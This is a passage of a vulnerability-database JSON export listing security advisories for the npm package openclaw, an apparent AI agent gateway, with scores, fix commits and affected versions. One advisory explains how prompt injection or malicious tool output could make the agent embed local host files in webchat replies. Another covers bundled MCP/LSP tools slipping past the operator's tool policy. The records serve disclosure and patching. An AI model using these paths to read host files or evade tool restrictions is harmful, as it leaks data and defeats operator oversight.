                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41393",
                "GHSA-q9w8-cf67-r238"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g3hg-peh1-tudm"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89500?format=api",
            "vulnerability_id": "VCID-g8r6-x6s5-uydq",
            "summary": "OpenClaw: Telegram audio preflight transcription enables resource consumption by unauthorized senders\n## Summary\nTelegram audio preflight transcription enables resource consumption by unauthorized senders\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still lets unauthorized Telegram group senders trigger audio preflight before allowlist enforcement, but the real impact is resource or billing burn rather than direct data exposure or host compromise.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c4fa8635d03943ffe9e294d501089521dca635c5` — 2026-03-30T12:19:31+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41331",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1772",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17683",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00056",
                            "scoring_system": "epss",
                            "scoring_elements": "0.17714",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41331"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/c4fa8635d03943ffe9e294d501089521dca635c5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/c4fa8635d03943ffe9e294d501089521dca635c5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m6fx-m8hc-572m",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m6fx-m8hc-572m"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41331",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41331"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-unauthorized-telegram-audio-preflight-transcription",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-unauthorized-telegram-audio-preflight-transcription"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-m6fx-m8hc-572m",
                    "reference_id": "GHSA-m6fx-m8hc-572m",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-m6fx-m8hc-572m"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41331",
                "GHSA-m6fx-m8hc-572m"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g8r6-x6s5-uydq"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89007?format=api",
            "vulnerability_id": "VCID-gk95-28x9-17dk",
            "summary": "OpenClaw: Webchat audio embedding could read local files without local-root containment\n## Impact\n\nOpenClaw deployments before `2026.4.15` could embed host-local audio files into webchat responses without applying the local media root containment check used by other media-serving paths.\n\nIf an attacker could influence an agent or tool-produced `ReplyPayload.mediaUrl`, the webchat audio embedding helper could resolve an absolute local path or `file:` URL, read an audio-like file under the size cap, and base64-encode it into the webchat media response. This crossed the model/tool-output boundary into a host file read. Prompt injection or malicious tool output is a delivery mechanism; the security boundary failure is the missing local-root containment check.\n\nThe impact is narrow: the file had to be readable by the gateway process, have an audio-like extension, and fit within the webchat audio size cap. The issue exposed contents into the webchat assistant/media transcript path; it was not a general remote filesystem API.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected versions: `<= 2026.4.14`\n- Patched version: `2026.4.15`\n\nThe latest public release, `2026.4.21`, also contains the fix.\n\n## Patches\n\nThe public fix threads the applicable local media roots into the webchat audio embedding path and calls `assertLocalMediaAllowed` before local audio content is read. Current `main` also includes an additional `trustedLocalMedia` gate so untrusted model/tool payloads cannot opt into local audio embedding.\n\nFix commit:\n\n- `6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde`\n\n## Workarounds\n\nUpgrade to `openclaw@2026.4.15` or later. The latest public release, `2026.4.21`, is fixed. Before upgrading, avoid exposing webchat sessions to untrusted prompt/tool content that can influence reply media URLs.\n\n## Credits\n\nOpenClaw thanks @zsxsoft for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gfg9-5357-hv4c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gfg9-5357-hv4c"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gfg9-5357-hv4c",
                    "reference_id": "GHSA-gfg9-5357-hv4c",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gfg9-5357-hv4c"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109881?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.15",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"
                }
            ],
            "aliases": [
                "GHSA-gfg9-5357-hv4c"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gk95-28x9-17dk"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89411?format=api",
            "vulnerability_id": "VCID-gkyv-ahk7-1ud3",
            "summary": "OpenClaw: Bundled MCP/LSP tools could bypass configured tool policy\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nBundled MCP and LSP tools could be appended to the agent's effective tool set after the normal tool-policy pipeline had already filtered core tools. If an operator configured a restrictive policy, such as a tool profile, explicit allow/deny list, owner-only tool restriction, sandbox tool policy, or subagent tool policy, a bundled MCP/LSP tool could remain available even though the same policy would have denied it.\n\nThe issue required a configured bundled MCP or LSP tool source and an operator policy that should have restricted that tool. This was a local agent policy-enforcement bypass, not an unauthenticated remote gateway compromise. Severity is medium.\n\n## Fix\n\nOpenClaw now applies a final effective tool policy pass to bundled MCP/LSP tools before merging them into the tool set used by normal runs and compaction. The pass covers profile policy, provider profile policy, global/agent/group policies, owner-only filtering, sandbox tool policy, and subagent tool policy.\n\nFix commit:\n\n- `0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qrp5-gfw2-gxv4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qrp5-gfw2-gxv4"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qrp5-gfw2-gxv4",
